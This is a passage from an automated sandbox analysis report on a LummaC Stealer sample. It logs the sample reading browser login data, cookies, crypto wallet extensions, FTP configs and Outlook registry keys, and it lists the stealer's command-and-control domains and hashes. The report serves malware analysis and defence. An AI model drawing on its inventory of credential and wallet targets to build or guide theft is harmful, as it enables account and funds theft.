          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\key4.db
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\cookies.sqlite
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\formhistory.sqlite
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
          Tries to harvest and steal ftp login credentials
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Roaming\FTPbox
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Roaming\FTPInfo
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Roaming\FTPGetter
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Roaming\FTPRush
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\ProgramData\SiteDesigner\3D-FTP
          Tries to steal Crypto Currency Wallets
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Roaming\Ledger Live
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Roaming\Binance
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
          Tries to steal Mail credentials (via file / registry access)
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifKey opened: HKEY_USERS.DEFAULT\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifKey opened: HKEY_USERS.DEFAULT\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifKey opened: HKEY_USERS.DEFAULT\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifKey opened: HKEY_USERS.DEFAULT\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifKey opened: HKEY_USERSS-1-5-20\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifKey opened: HKEY_USERSS-1-5-20\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifKey opened: HKEY_USERSS-1-5-20\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifKey opened: HKEY_USERSS-1-5-20\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifKey opened: HKEY_CURRENT_USER\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifKey opened: HKEY_CURRENT_USER\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifKey opened: HKEY_CURRENT_USER\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifKey opened: HKEY_CURRENT_USER\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifKey opened: HKEY_USERS.DEFAULT\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifKey opened: HKEY_USERS.DEFAULT\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifKey opened: HKEY_USERS.DEFAULT\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifKey opened: HKEY_USERS.DEFAULT\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004

          Remote Access Functionality

          barindex
          Yara detected LummaC Stealer
          Source: Yara matchFile source: 0000000C.00000003.1864702800.00000000014A2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.2521442122.0000000000D5F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity Information1
          Scripting          		Valid Accounts21
          Windows Management Instrumentation          		2
          Scheduled Task/Job          		511
          Process Injection          		121
          Masquerading          		2
          OS Credential Dumping          		22
          Security Software Discovery          		Remote Services1
          Email Collection          		1
          Web Service          		Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault Accounts2
          Scheduled Task/Job          		1
          Scripting          		2
          Scheduled Task/Job          		131
          Virtualization/Sandbox Evasion          		LSASS Memory2
          Process Discovery          		Remote Desktop Protocol3
          Data from Local System          		2
          Encrypted Channel          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAt1
          Registry Run Keys / Startup Folder          		1
          Abuse Elevation Control Mechanism          		511
          Process Injection          		Security Account Manager131
          Virtualization/Sandbox Evasion          		SMB/Windows Admin SharesData from Network Shared Drive2
          Non-Application Layer Protocol          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCron11
          DLL Side-Loading          		1
          Registry Run Keys / Startup Folder          		1
          Abuse Elevation Control Mechanism          		NTDS1
          Application Window Discovery          		Distributed Component Object ModelInput Capture3
          Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script11
          DLL Side-Loading          		11
          DLL Side-Loading          		LSA Secrets2
          File and Directory Discovery          		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials153
          System Information Discovery          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          No Antivirus matches

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\215655\Comparing.pif5%ReversingLabs
          C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exe0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\rrwkeeb100%Joe Sandbox ML

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          No Antivirus matches

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          cdn2.creative-habitat.shop
          		188.114.97.3
          		truefalse
            		unknown
            cdn1.creative-habitat.shop
            		188.114.96.3
            		truefalse
              		unknown
              cdn4.creative-habitat.shop
              		188.114.96.3
              		truefalse
                		unknown
                proggresinvj.cyou
                		104.21.32.51
                		truefalse
                  		unknown
                  rentry.co
                  		172.67.75.40
                  		truetrue
                    		unknown
                    gardenhub-fitlife.com
                    		172.67.182.119
                    		truetrue
                      		unknown
                      tkuIaWVNSUOHYBGsHHYaNMFgSmiW.tkuIaWVNSUOHYBGsHHYaNMFgSmiW
                      		unknown
                      		unknowntrue
                        		unknown
                        gardenhub-fitlife3.com
                        		unknown
                        		unknowntrue
                          		unknown
                          gardenhub-fitlife2.com
                          		unknown
                          		unknowntrue
                            		unknown

                            Contacted URLs

                            NameMaliciousAntivirus DetectionReputation
                            http://gardenhub-fitlife.com/g9jvjfd73/index.phptrue
                              		unknown

                              World Map of Contacted IPs

                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs

                              Public IPs

                              IPDomainCountryFlagASNASN NameMalicious
                              188.114.97.3
                              		cdn2.creative-habitat.shopEuropean Union
                              		13335CLOUDFLARENETUSfalse
                              188.114.96.3
                              		cdn1.creative-habitat.shopEuropean Union
                              		13335CLOUDFLARENETUSfalse
                              172.67.182.119
                              		gardenhub-fitlife.comUnited States
                              		13335CLOUDFLARENETUStrue
                              184.28.90.27
                              		unknownUnited States
                              		16625AKAMAI-ASUSfalse
                              172.67.75.40
                              		rentry.coUnited States
                              		13335CLOUDFLARENETUStrue
                              104.21.32.51
                              		proggresinvj.cyouUnited States
                              		13335CLOUDFLARENETUSfalse

                              Private

                              IP
                              127.0.0.1

                              General Information

                              Joe Sandbox version:41.0.0 Charoite
                              Analysis ID:1547706
                              Start date and time:2024-11-02 22:41:38 +01:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:defaultwindowsinteractivecookbook.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of analysed new started processes analysed:69
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • EGA enabled
                              Analysis Mode:stream
                              Analysis stop reason:Timeout
                              Sample name:MilwaukeeRivers.exe
                              Detection:MAL
                              Classification:mal100.troj.spyw.expl.evad.winEXE@114/21@13/31
                              Cookbook Comments:
                              • Found application associated with file extension: .exe

                              Warnings

                              • Exclude process from analysis (whitelisted): dllhost.exe
                              • Excluded IPs from analysis (whitelisted): 20.3.187.198
                              • Excluded domains from analysis (whitelisted): fe3.delivery.mp.microsoft.com, fs.microsoft.com, slscr.update.microsoft.com, glb.cws.prod.dcat.dsp.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                              • Not all processes where analyzed, report is missing behavior information
                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              • Report size getting too big, too many NtSetInformationFile calls found.
                              • VT rate limit hit for: MilwaukeeRivers.exe

                              Created / dropped Files

                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                              Download File
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):15524
                              Entropy (8bit):5.537153882278845
                              Encrypted:false
                              SSDEEP:
                              MD5:35E23EE3776B2DC44063F2776B6D6A38
                              SHA1:43D61A1FA7913DD1644A805E6C30F3BFD267F416
                              SHA-256:D13BE5073F0793FAFCA994100EF6228EB7A16EB0C3C3E9056AFDD66A3A91AC69
                              SHA-512:E7918B6D518309594621F67163C24CD858BA29A07C708A9D3762C635B3AE37B88892E31DBB940506FDD0556ADD7D6EEB0FF7F60830AF766C670C4B955B106C66
                              Malicious:false
                              Reputation:unknown
                              Preview:@...e...........;.....................!.........................H...............o..b~.D.poM...1..... .Microsoft.PowerShell.ConsoleHostD...............4..7..D.#V.............System.Management.Automation4...............<."..Ke@...j..........System.Core.0.................Vn.F..kLsw..........System..4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.@................z.U..G...5.f.1........System.DirectoryServices<................t.,.lG....M...........System.Management...4..................~..2K..}...0".......System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.............................................V.@..?@.Ig@.Eg@.:5@.95@...@.X.@.J.@.Z.@.^...aT..[T...T...S......{T@..S@..T@..S@._.@..T@..T@.VX@.UX@.

                              C:\Users\user\AppData\Local\Temp\215655\Comparing.pif

                              Download File
                              Process:C:\Windows\SysWOW64\cmd.exe
                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Category:modified
                              Size (bytes):893608
                              Entropy (8bit):6.62028134425878
                              Encrypted:false
                              SSDEEP:
                              MD5:18CE19B57F43CE0A5AF149C96AECC685
                              SHA1:1BD5CA29FC35FC8AC346F23B155337C5B28BBC36
                              SHA-256:D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
                              SHA-512:A0C58F04DFB49272A2B6F1E8CE3F541A030A6C7A09BB040E660FC4CD9892CA3AC39CF3D6754C125F7CD1987D1FCA01640A153519B4E2EB3E3B4B8C9DC1480558
                              Malicious:true
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 5%
                              Reputation:unknown
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Local\Temp\215655\g

                              Download File
                              Process:C:\Windows\SysWOW64\cmd.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):509642
                              Entropy (8bit):7.999685073845076
                              Encrypted:true
                              SSDEEP:
                              MD5:D266B3C08227E9CB46232736B80E5AA0
                              SHA1:173C8ACEE3ADEAE51142BD0E72C3309E34EE520F
                              SHA-256:EC2604A7647C0186B5E12315F62C27927DBB1CF8F939612E129DCDFC1392B998
                              SHA-512:59CFE54E855D98F3F4B01FA7670B9594376C450CFE210E5F626574DD7449E066F55B6C8D218428601AC526A9D0F2BA7A244D54C12B4DCA6E0919800B58F31F0B
                              Malicious:false
                              Reputation:unknown
